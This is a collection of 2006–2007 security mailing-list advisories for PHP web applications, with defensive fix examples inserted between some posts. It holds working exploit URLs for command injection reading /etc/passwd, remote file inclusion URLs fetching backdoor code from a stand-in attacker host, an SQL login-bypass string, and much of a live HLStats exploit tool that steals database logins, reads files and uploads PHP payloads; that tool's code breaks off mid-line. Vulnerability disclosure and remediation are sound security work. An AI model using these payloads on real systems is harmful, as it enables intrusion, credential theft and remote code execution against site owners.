Apparently there is some disagreement about this issue. I am providing more 
information to build a greater understanding about what is happening. 


This problem is entirely contained within the query.php file.  At the comment 
header of query.php it says: The Big Query.  Yes indeed this file produces a 
large query.   This file is very disorganized and it was difficult to go though 
with a fine tooth comb, but I did and I found a flaw because of it.   I was 
looking for SQL Injection,  but broken access control will get me a CVE number.


Perhaps this URL provides more information:

http://localhost/wordpress/index.php/'wp-admin/

I urge everyone to make this get request and to print the 
$_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF']  variables.

You will see that wp-admin/ is at the end of these variables.


I should have provided the exact point in which the flawed query is being 
built.  I thought that my PoC was enough, my bad.

if ( is_admin() )
	$where .= " OR post_status = 'future' OR post_status = 'draft' OR post_status = 'pending'";


This url:   htttp://localhost/wordpress/index.php/'wp-admin/ will cause the 
is_admin() function to return TRUE.

function is_admin () {
	global $wp_query;

	return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}


In the future you shouldn't attack someone who is trying to help.  This is a 
complex and irregular issue so I totally understand why it was difficult to 
see.   In the future you shouldn't dismiss something you do not understand,  
instead I urge you to ask questions and learn more.  


Peace


Phpay - Local File Inclusion

2007-12-15 Thread th3 . r00k . nospam
By Michael Brooks


Vulnerability Type:Local File Inclusion


Software: Phpay


Homepage:http://sourceforge.net/projects/phpay/


Version Affected:2.02.1




Phpay has been affected by multiple local file include flaws, as a result this 
patch was written:


$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; 
echo "<!--$config-->\n";}

if (!file_exists($config)) { echo "panic: $config doesn't exist!! Did you 
backup it after installation? ..."; exit;}

require("./$config");




To bypass this patch backslashes can be used instead of forward slashes on 
windows systems.  


Also .inc.php must exist *somewhere* in the string.


Local File Include for windows only:


http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess


or if magic_quotes_gpc is turned on:


http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess




Remote code execution is accessible in the ./admin/ folder. 


The admin folder *should* be protected by a .htaccess file similar to 
osCommerce2. 




Vulnerable configuration:


There is a call to extract($_GET) so the exploit will work regardless of 
register_globals.  Using Linux is a very good fix for this issue. 






Merry Christmas
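The patch quoted above fails for two reasons the post spells out: it strips substrings instead of deciding what a valid name looks like, so a backslash separator walks straight past it on Windows, and it only requires ".inc.php" to occur somewhere. The following is an added example, not Phpay's patch, of the positive approach: accept only a plain file name, then canonicalize with realpath() and confirm the result lives directly in the expected directory. CONFIG_DIR and resolveConfig() are assumptions for illustration; the test inputs are constructed, including the Windows bypass string from the post.

```php
<?php
// Added example (not Phpay's code): confine a user-supplied config name to a
// single directory by validation plus canonicalization rather than by
// stripping "../" and "/". CONFIG_DIR and resolveConfig() are assumed names.

declare(strict_types=1);

const CONFIG_DIR = __DIR__ . '/conf';

/**
 * Return the absolute path of an allowed config file, or null if the input
 * is anything other than a plain "<name>.inc.php" inside CONFIG_DIR.
 */
function resolveConfig(string $name): ?string
{
    // Embedded NUL bytes truncate paths at the C level; refuse them outright.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // Positive pattern: letters, digits, '-' and '_' followed by exactly
    // ".inc.php". Neither '/' nor '\' can appear, so the OS separator is
    // irrelevant and "eregi.inc.php\..\admin\.htaccess" is rejected here.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.inc\.php\z/', $name)) {
        return null;
    }
    // Canonicalize both sides and require the file to sit directly in the
    // directory (not merely somewhere below it).
    $base = realpath(CONFIG_DIR);
    $real = realpath(CONFIG_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false || dirname($real) !== $base) {
        return null;
    }
    return $real;
}

// Constructed inputs and the decision expected for each. 'config.inc.php'
// is accepted only if conf/config.inc.php actually exists on disk.
$cases = [
    'config.inc.php'                      => 'accept',
    'eregi.inc.php\\..\\admin\\.htaccess' => 'reject',
    '../admin/.htaccess'                  => 'reject',
    "config.inc.php\0.txt"                => 'reject',
    'http://example.test/shell.inc.php'   => 'reject',
];
foreach ($cases as $input => $expected) {
    $got = resolveConfig($input) === null ? 'reject' : 'accept';
    printf("%-40s expected %-6s got %s\n", addcslashes($input, "\0"), $expected, $got);
}
```

Because realpath() fails on URLs and on paths that do not exist, the same check also rejects remote-include payloads, which makes it a reasonable drop-in wherever a request value currently feeds include or require.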



Anon Proxy Server - Remote Code Execution

2007-12-15 Thread th3 . r00k . nospam
By Michael Brooks


Vulnerability type: Multiple Remote System commands execution. 


Software: Anon Proxy Server


Home page:http://sourceforge.net/projects/anonproxyserver/


Affects version: 0.100




Example exploit:


http://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23




A virtually identical flaw exists in diagconnect.php however it takes longer to 
execute.




Anon Proxy Server forces magic_quotes_gpc=on, however magic_quotes_gpc does 
not protect the system() function from taint.  For protection you should use 
the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the 
best temporary solution.  Also magic_quotes_gpc is being removed in php6, so 
Anon Proxy Server will have to revamp their security. 




Peace
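As the post notes, magic_quotes_gpc only escapes quotes and does nothing about "&&", ";" or "|", which is why the diagnostic page could be driven into running extra commands. The following is an added example, not Anon Proxy Server's code, of the two-layer fix for a host-lookup endpoint: a strict hostname pattern first, then escapeshellarg() around the only value that reaches the shell. isValidHostname(), dnsLookupCommand() and the use of nslookup are assumptions for illustration; the inputs at the bottom are constructed, one of them being the injection string from the post.

```php
<?php
// Added example (not Anon Proxy Server's code): hardening a DNS diagnostic
// that shells out. Function names and the nslookup binary are assumptions.

declare(strict_types=1);

/** RFC 1123 host name: dot-separated labels of letters, digits and hyphens. */
function isValidHostname(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    return (bool)preg_match(
        '/\A(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\z/',
        $host
    );
}

/**
 * Build the command line for a lookup, or return null for invalid input.
 * escapeshellarg() single-quotes the value and escapes embedded quotes, so
 * shell metacharacters are inert even if the pattern above were loosened.
 */
function dnsLookupCommand(string $host): ?string
{
    if (!isValidHostname($host)) {
        return null;
    }
    return 'nslookup ' . escapeshellarg($host);
}

/** Run the lookup and return its output, refusing anything not a host name. */
function dnsLookup(string $host): ?string
{
    $cmd = dnsLookupCommand($host);
    if ($cmd === null) {
        error_log('diagdns: rejected host parameter ' . var_export($host, true));
        return null;
    }
    return (string)shell_exec($cmd);
}

// Constructed inputs: a normal host and the payload quoted in the post.
foreach (['google.com', "google.com\\' && cat /etc/passwd #"] as $input) {
    $cmd = dnsLookupCommand($input);
    echo $cmd === null ? "rejected:  $input\n" : "would run: $cmd\n";
}
```

Where the feature only needs address resolution, gethostbynamel() removes the shell from the picture entirely, which is the better design; the validation above is what to keep when an external tool really is required.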


Oreon/Centreon - Multiple Remote File Inclusion

2007-12-15 Thread th3 . r00k . nospam
By Michael Brooks


Vulnerability Type: Multiple Remote File Inclusion.


Software: Oreon and Centreon


Homepage:http://www.oreon-project.org/  or http://www.centreon.com/


Versions: 1.4(Oreon) and 1.4.1(Centreon)




The vulnerable file is:


./oreon-1.4/www/include/monitoring/engine/MakeXML.php


Another,virtually identical RFI:


./oreon-1.4/www/include/monitoring/engine/MakeXML4statusCounter.php




The attack:


http://127.0.0.1/include/monitoring/engine/MakeXML.php?fileOreonConf=http://evilurl/backdoor.txt?


or


http://127.0.0.1/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://evilurl/backdoor.txt?




file MakeXML.php line 42 & 43:


include_once($oreonPath . "www/oreon.conf.php");


include_once($oreonPath . "www/include/common/common-Func-ACL.php");




Register_globals isn't needed for the taint:


file MakeXML.php line 28:


if (isset($_GET["fileOreonConf"]))


$oreonPath = $_GET["fileOreonConf"];




However magic_quotes_gpc is required for LFI because you need a null byte. 




Peace


PHP RPG - Sql Injection and Session Information Disclosure.

2007-12-15 Thread th3 . r00k . nospam
By Michael Brooks

Vulnerability: Sql Injection and Session Information Disclosure. 

Homepage:http://sourceforge.net/projects/phprpg/

Version affected 0.8.0


There are two flaws that affect this application. A nearly vanilla login bypass 
issue affects phprpg.  If magic_quotes_gpc=off then this will login an 
attacker as the administrator using this:

username:1'or 1=1 limit 1/*

password:1

Keep in mind that magic_quotes_gpc is being removed in php6!


The second flaw allows an attacker to steal any session registered by phprpg by 
navigating to this directory:

http://localhost/phpRPG-0.8.0/tmp/

This is because phprpg has manually changed the directory using 
session_save_path() which is called in init.php on line 49. 


Peace


Wordpress - Broken Access Control

2007-12-15 Thread th3 . r00k . nospam
By Michael Brooks


Vulnerability:Broken Access Control


Homepage:http://wordpress.org/download


Software: Wordpress


Version affected:2.3.1 (Latest at the time of writing)




The impact of the flaw is that an attacker can read posts while they are still 
drafts.  This is an ability that only the administrator should have.  Imagine a 
stranger being able to read the news before it is published.   Or perhaps a 
spam-blog harvesting posts before they are published. 




This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global 
variable.  Manipulation of $_SERVER['REQUEST_URI'] has led to many xss flaws.  
Although an attacker shouldn't be able to control all $_SERVER variables, none 
of them should be trusted.  




exploit:


htttp://localhost/wordpress/'wp-admin/



This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to 
contain the value:

htttp://localhost/wordpress/'wp-admin/



Vulnerable function:


line 34,  in ./wp-includes/query.php.


function is_admin () {
	global $wp_query;

	return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}


The same flaw is duplicated again on line 645 of the same file.




This url: htttp://localhost/wordpress/'wp-admin/

  will cause the is_admin() function to return true. This flaw works regardless 
of register_globals or magic_quotes_gpc.  The attack fails when search engine 
friendly urls are turned on in wordpress,  however this option is turned off by 
default.  Turning search engine friendly urls on is a workaround until a patch 
is created.  




Peace
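The is_admin() shown above and in the earlier reply decides "admin context" from a substring of the URL the client typed, and the query builder then adds draft and pending posts to the result set on that basis. The following is an added example, not WordPress code, contrasting that test with one based on the script the server actually resolved: SCRIPT_FILENAME is set by the web server from the file on disk, so trailing path-info like "/'wp-admin/" cannot influence it. ABSPATH, is_admin_by_uri() and is_admin_request() are assumptions for illustration and the two requests are constructed.

```php
<?php
// Added example (not WordPress code): the REQUEST_URI substring test from
// query.php next to a check keyed on the executing script. ABSPATH and the
// function names are assumed for illustration.

declare(strict_types=1);

const ABSPATH = '/var/www/wordpress/';

/** The flawed test reproduced for comparison: any "wp-admin/" anywhere. */
function is_admin_by_uri(string $requestUri): bool
{
    return stripos($requestUri, 'wp-admin/') !== false;
}

/**
 * Admin context only if the script PHP is running lives under
 * ABSPATH/wp-admin/. $_SERVER['SCRIPT_FILENAME'] comes from the server's
 * file resolution, not from the request line, so path-info appended to a
 * front-end URL never reaches it. In production, realpath() on both sides
 * would additionally collapse symlinks; it is omitted here so the
 * constructed paths below need not exist.
 */
function is_admin_request(string $scriptFilename): bool
{
    $script = str_replace('\\', '/', $scriptFilename);
    if (strpos($script, '/../') !== false) {
        return false;
    }
    return strpos($script, rtrim(ABSPATH, '/') . '/wp-admin/') === 0;
}

/** Build the post_status clause the way query.php does, with the safe test. */
function postStatusWhere(bool $adminContext): string
{
    $where = "post_status = 'publish'";
    if ($adminContext) {
        $where .= " OR post_status = 'future' OR post_status = 'draft' OR post_status = 'pending'";
    }
    return $where;
}

// Constructed requests: the front page hit with the path-info from the
// post, and a genuine admin page.
$cases = [
    ["/wordpress/index.php/'wp-admin/", ABSPATH . 'index.php'],
    ['/wordpress/wp-admin/edit.php',    ABSPATH . 'wp-admin/edit.php'],
];
foreach ($cases as [$uri, $script]) {
    printf("%-36s uri-check=%-5s script-check=%-5s where: %s\n",
        $uri,
        is_admin_by_uri($uri) ? 'true' : 'false',
        is_admin_request($script) ? 'true' : 'false',
        postStatusWhere(is_admin_request($script)));
}
```

The more general lesson from the post holds for every $_SERVER entry that echoes the request line (REQUEST_URI, PHP_SELF, PATH_INFO, QUERY_STRING): they are request data and belong in the same trust class as $_GET.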


IceBB 1.0rc6 <= Remote SQL Injection

2007-11-19 Thread aeroxteam-nospam
[|Description:|]

A security breach has been discovered in IceBB 1.0-rc6.

This breach is caused by a bad filtering of the X-Forwarded-For variable:


 ./includes/functions.php, line 73

$ip  = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR'] : $_SERVER['HTTP_X_FORWARDED_FOR'];

$ip = $this->clean_key($ip);

$input['ICEBB_USER_IP'] = $ip;


 ./icebb.php, line 169

$icebb->client_ip   = $input['ICEBB_USER_IP'];


 ./admin/index.php, line 112

$icebb->adsess  = $db->fetch_result("SELECT adsess.*,u.id as userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE adsess.asid='{$icebb->input['s']}' AND adsess.ip='{$icebb->client_ip}' LIMIT 1");


A hacker could exploit this security breach in order to alter a SQL request.


[|Exploit:|]

http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php


[|Solution:|]

None. Think about updating your forum core when a patch is available on 
the official website.


[|Credits:|]

Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)

for AeroX (AeroXteam.fr)


[|Greetz:|]

Math², KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody 
from #aerox
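Two things go wrong in the IceBB lines above: a client-controlled header (X-Forwarded-For) is treated as the client's address, and that string is interpolated into SQL. The earlier phpRPG post is the same second mistake on a login form. The following is an added example, not IceBB's or phpRPG's code, that fixes both: the header is honoured only when the direct peer is a proxy the site operates and only if the value parses as an IP address, and every user-derived value reaches the database as a bound parameter. The table and column names follow the IceBB query; the `users` table, the PDO connection and the request environment at the bottom are assumptions and constructed data.

```php
<?php
// Added example (not IceBB or phpRPG code): trusted-proxy handling for
// X-Forwarded-For plus parameterized queries for the session lookup and a
// login check. Table names follow the IceBB post; `users`, the PDO handle
// and the $server array are assumed or constructed.

declare(strict_types=1);

/**
 * Client address for logging and session binding. The forwarded header is
 * used only when REMOTE_ADDR is one of our own proxies, and only the first
 * hop is taken, and only if it is a syntactically valid IP address.
 */
function clientIp(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $xff    = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff !== '' && in_array($remote, $trustedProxies, true)) {
        $first = trim(explode(',', $xff)[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $remote;
}

/** The admin-session lookup from admin/index.php, with bound parameters. */
function fetchAdminSession(PDO $db, string $sid, string $ip): ?array
{
    $sql = 'SELECT adsess.*, u.id AS userid, u.username, u.temp_ban, g.g_view_board
              FROM icebb_adsess AS adsess
         LEFT JOIN icebb_users  AS u ON u.username = adsess.user
         LEFT JOIN icebb_groups AS g ON u.user_group = g.gid
             WHERE adsess.asid = :sid AND adsess.ip = :ip
             LIMIT 1';
    $st = $db->prepare($sql);
    $st->execute([':sid' => $sid, ':ip' => $ip]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Login check in the style of the phpRPG post, but safe: a username such as
 *   1'or 1=1 limit 1/*
 * is compared as data, and the password is verified against a stored hash.
 */
function verifyLogin(PDO $db, string $username, string $password): bool
{
    $st = $db->prepare('SELECT password_hash FROM users WHERE username = :u LIMIT 1');
    $st->execute([':u' => $username]);
    $hash = $st->fetchColumn();
    return $hash !== false && password_verify($password, (string)$hash);
}

// Constructed environment: the peer is not a trusted proxy, so the spoofed
// header is ignored and REMOTE_ADDR is what gets bound into the query.
$server = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => "1.2.3.4' OR 1=1 -- ",
];
echo clientIp($server, ['10.0.0.5']), "\n";
```

Two related points from the same posts: the phpRPG session leak comes from placing session_save_path() under the document root, so whatever directory is chosen must be outside it and unreadable by other users; and clean_key() in the IceBB snippet is not a substitute for binding, since an escaping routine has to be correct for the exact database and charset in use while a placeholder never needs to be.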



Re: IceBB 1.0rc6 <= Remote SQL Injection

2007-11-19 Thread aeroxteam-nospam
correction


[|Exploit:|]

http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.txt


Re: MkPortal All Guests are Admin Exploit

2007-09-03 Thread nospam
Fixed In Mkportal version 1.1.1


MetaForum <= 0.513 Beta - Remote file upload Vulnerability

2007-03-19 Thread aeroxteam------nospam-----
[|Description:|]
A security bug has been discovered in MetaForum 0.513 Beta.
This bug can be used by an attacker to upload a malicious php file on the 
server.
During the upload, the MIME type of the file is the only verified parameter. 
The extension isn't.
This enables an attacker to fake the MIME type of a php file so that it is 
considered as an image.

[|Exploit:|]
http://www.aeroxteam.fr/exploit-MetaForum-0.513b.txt

[|Solution:|]
Replace line 110 in the file usercp.php by:
if (($_FILES['imagefile']['type'] == "image/jpeg" || 
$_FILES['imagefile']['type'] == "image/pjpeg" || $_FILES['imagefile']['type'] 
== "image/png" || $_FILES['imagefile']['type'] == "image/gif") && 
in_array(strtolower(substr(strrchr($_FILES['imagefile']['name'], '.'),1)), 
array('gif', 'jpg', 'jpeg', 'png')))

[|Credits:|]
Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)
for AeroX  NeoAlpha (AeroXteam.fr -- Neoalpha.fr)

[|Gr33tz:|]
Math², Syntax ERROR, Barma, NeoMorphS, Snake91, Spamm, Kad, Nitr0,  Jethro And 
everybody from #aerox
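The suggested one-line fix above adds an extension check, which is the essential piece, but it still reads $_FILES[...]['type'], a value the client sets freely. The following is an added example, not MetaForum's code, of a complete server-side upload check: extension allowlist on the original name, content sniffing of the actual bytes with finfo, a decode test with getimagesize(), and a random server-chosen file name in a directory that is served statically. UPLOAD_DIR and storeUploadedImage() are assumptions for illustration; the 'imagefile' field name follows the post.

```php
<?php
// Added example (not MetaForum code): validating an avatar upload without
// trusting the client-supplied MIME type. UPLOAD_DIR and the function name
// are assumed; the 'imagefile' field follows the post above.

declare(strict_types=1);

// Must be a directory the web server serves as static files only (no PHP
// handler), so even a mis-stored file could never execute.
const UPLOAD_DIR = __DIR__ . '/avatars';

/** Store one uploaded image; return its path or null if rejected. */
function storeUploadedImage(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // 1. Extension allowlist on the client's original name: the last dot
    //    decides, so "shell.php.jpg" is "jpg" here and goes on to step 2.
    $allowed = ['gif' => 'image/gif', 'jpg' => 'image/jpeg',
                'jpeg' => 'image/jpeg', 'png' => 'image/png'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }

    // 2. Detect the content type from the bytes on disk. $file['type'] is
    //    whatever the client claimed and is deliberately never read.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($detected !== $allowed[$ext]) {
        return null;
    }

    // 3. It must actually decode as an image; a PHP file with a forged
    //    magic-number prefix is rejected at this step.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // 4. Never reuse the client's name: random name, extension we chose.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0644);
    return $target;
}

if (isset($_FILES['imagefile']) && is_array($_FILES['imagefile'])) {
    $stored = storeUploadedImage($_FILES['imagefile']);
    if ($stored === null) {
        http_response_code(400);
        error_log('Rejected upload ' . var_export($_FILES['imagefile']['name'] ?? '', true));
        exit('Upload rejected.');
    }
    echo 'Stored as ', htmlspecialchars(basename($stored), ENT_QUOTES, 'UTF-8');
}
```

The ordering matters for detection as much as for safety: because the extension check runs first, a log of rejections from step 2 or 3 shows files that carried an image extension with non-image content, which is exactly the pattern the advisory describes.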


Re: Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability

2007-01-23 Thread nospam
Could you please provide more details about this vulnerability ? Especially 
which versions are affected :-)

Kind regards,

Marek Kroemeke 


HLStats Remote SQL Injection Exploit

2006-12-26 Thread nospam
Hlstats is more than 5 years old.  HLstats has been downloaded more than 
270,000 from http://sf.net.   Nothing more than absolutely benign XSS has been 
reported for this application,  until NOW. 

Merry Christmas,
--Michael Brooks 

Homepage:
http://sourceforge.net/projects/hlstats/

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

brb
<?php
/*
Live Exploit Code
SQL Inection + Path Disclosure
Affects HLStats HLStats <=1.34  and Hlstats >= 1.20
works with magic_quotes_gpc=On
by Michael Brooks
*/

 print "<title>HLStats SQL Injection Exploit</title>
 <body bgcolor='#009900'>
 <font  color='#FF'>
<b></b><br><br>
<center><b> <br>
Welcome To HLstats Exploit code.<br><br>
</b></center> 
<br> 
SQL Inection + Path Disclosure<br>
Affects Hlstats >= 1.20 to HLStats <=1.34(current)<br>
Tested on Linux and Windows<br>
works with magic_quotes_gpc=On!<br>
HLStats has gone though 5 years with no exploits so this is a Birthday Present!<br>
Merry Christmass!<br>
By Michael Brooks<br>
<br>
<b></b><br><br>
";
 
 print "
<form action='".$_SERVER['PHP_SELF']."' method='post'>
<b>Target:</b><br>
<input type='text' name='target' size=32><br>
(hint: where the login form is. example: http://domain.com/path/hlstats.php )<br>
<br><b>Proxy:</b>(ip:port or name:[EMAIL PROTECTED]:port)<br>
<input type='text' name='proxy' size=32><br>
(example: 127.0.0.1:8118   Use <a href='http://tor.eff.org'>Tor</a>+<a href='http://www.privoxy.org/'>Privoxy</a>. )<br>
<br><br>
If nothing is changed below this line then the exploit will attempt to 
get the database login information in plain text.
<b></b><br><br>
<H1>ATTACKS:</H1>
<br>
<b>Database Selects:</b><br>
<br>
OBTIAN HLStats logins:<br>
<input type='submit' name='button' value='HLStats_Logins'>(Passwords 
are stored as MD5 hashs, use: <a href='http://www.milw0rm.com/cracker/insert.php'>Milw0rm's MD5 Cracker</a>)<br>

  OBTIAN mysql.user logins:<br>
<input type='submit' name='button' value='Mysql_Logins'><br>
<br>

<br>
<b>File IO:</b><br><br>
<b>Path Disclosure</b><br>
<input type='submit' name='button' value='Path'><br>
<br>
<b>Plain Text Database Login Information</b><br>
<input type='submit' name='button' value='Read_Login'>
(This will attempt to read the configuration file for hlstats and dump 
the PLAIN TEXT database login information.)<br>
<br>
<b>Read Other File</b><br>
<input type='submit' name='button' value='Read_File'>
<input type='text' name='read_file' size=50>
<br>example: /etc/passwd<br>
OR for windows based systems: C:WINDOWSrepairsam<br>
<br><b>attempt payload:</b>(WARNING,  NO PROXY IS USED FOR UPLOADING 
PAYLOAD)<br>
<input type='submit'  name='button' value='Upload'>
 &lt;?php <input type='text' name='payload' size=50>?&gt; <br>
example: system('netstat'); <br>

</form>

<br><b></b><br>
";

 //generic http class
class http{
var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='';

function http_gpc_send($loc ,$cookie="", $postdata = "") { 
 //overload function polymorphism between gets and posts
 $url=parse_url($loc);
 if(!isset($url['port'])){
   $url['port']=80;
}
//$ua=$_SERVER['HTTP_USER_AGENT'];
$ua='GPC/.01';
 if($this->proxy_ip!='' && $this->proxy_port!=''){
$fp = pfsockopen( $this->proxy_ip, $this->proxy_port, 
$errno, $errstr, 120 );
$url['path']=$url['host'].':'.$url['port'].$url['path'];
 }else{
$fp = fsockopen( $url['host'], $url['port'], $errno, 
$errstr, 120 );
 }
 
 if( !$fp ) {
print "$errstr ($errno)<br>\n";
 } else {
if( $postdata=='' ) {
fputs( $fp, "GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n" );
} else {
fputs( $fp, "POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n" );
}

if($this->proxy_name!='' && $this->proxy_pass!=''){
fputs($fp, "Proxy-Authorization: Basic 
".base64_encode($this->proxy_name.":".$this->proxy_pass)."\r\n\r\n");
}

fputs($fp, "Host: 

AROUNDMe 0.6.9 remote file inclusion

2006-10-23 Thread noislet . nospam

==
AROUNDMe 0.6.9 remote file inclusion
vendor site: http://barnraiser.org/
vulnerable versions: 0.6.9 (and possibly older)

discovered by: noislet  ( http://www.noislet.org/ )

vendor informed: 21.10.2006
published: 22.10.2006
==

product info:
AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.

==

bug details:
Input passed to the $templatePath is not verified before being used
to include files.

required:
register_globals = On

file:
pol_view.tpl.php (and others)

buggy code:
if (isset($poll)) {
...
include $templatePath . "poll_detail.inc.tpl.php";

==

example exploitation:
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00


--
noislet
   \ page http://www.noislet.org/